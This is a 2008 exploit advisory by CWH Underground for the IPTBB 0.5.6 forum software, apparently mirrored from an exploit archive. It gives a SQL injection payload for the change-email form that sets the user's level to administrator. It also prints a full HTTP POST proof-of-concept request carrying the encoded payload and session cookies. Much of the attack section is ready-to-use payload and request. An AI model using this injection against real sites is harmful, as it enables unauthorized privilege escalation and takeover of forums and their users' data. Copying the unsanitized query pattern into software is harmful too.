iptbb-admin.txt

iptbb-admin.txt: Posted Jun 11, 2008; Authored by CWH Underground | Site citecclub.org; IPTBB version 0.5.6 arbitrary add administrator exploit.; tags | exploit, arbitrary, add administrator; SHA-256 | 1605caeffa7574dfd66c1b80f96a27bfb09f4579ddca2b0d31dc2a419c573b99; Download | Favorite | View

iptbb-admin.txt

=========================================
 IPTBB 0.5.6 Arbitrary Add-Admin Exploit 
=========================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O  .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 11 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : IPTBB
 VERSION     : 0.5.6
 VENDOR       : http://iptbb.org/
 DOWNLOAD    : http://sourceforge.net/projects/iptbb
#####################################################

---Add-Admin Exploit---

***magic_quotes_gpc = off***

-------------
 Description
-------------

  IPTBB 0.5.6 have Vulnerability to escalate user's privilege to administartor's privilege.
That Vulnerable in "User Control Panel - Change Email" (http://[Target]/[iptbb_path]/index.php?act=usercp&p=email) 
and you can injection code into form,This action will give your account can use Admin Control Panel (http://[Target]/[iptbb_path]/admincp.php)
with Administrative's Privilege.

-----------------
 Vulnerable Path
-----------------
[+] http://[Target]/[iptbb_path]/index.php?act=usercp&p=email

--------------
 Exploit code 
--------------
[+] hacked',`level`='2

-----
 POC
-----

[+]POST http://[Target]/[iptbb_path]/index.php?act=usercp&p=email HTTP/1.1
[+]Host: [Target]
[+]User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
[+]Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
[+]Accept-Language: en-us,en;q=0.5
[+]Accept-Encoding: gzip,deflate
[+]Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
[+]Keep-Alive: 300
[+]Proxy-Connection: keep-alive
[+]Referer: http://localhost/iptbb/index.php?act=usercp&p=email
[+]Cookie: fusion_visited=yes; PHPSESSID=4a17d6283eef21e4e1d8e3264f9f26da; FOGSESSID=cce32d569575ec08780837d529947183; pfbx_sess=d96d044ae57aede13f2d8dc32779c80f; username=cwh; password=72eb4fe81127a6aa8d009b9dc31753da
[+]Content-Type: application/x-www-form-urlencoded
[+]Content-length: 109
[+]
[+]email=hacked%27%2C%60level%60%3D%272&cemail=hacked%27%2C%60level%60%3D%272&curemail=aa%40aa.com&submit=Submit

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

iptbb-admin.txt

iptbb-admin.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

iptbb-admin.txt

Share This

iptbb-admin.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems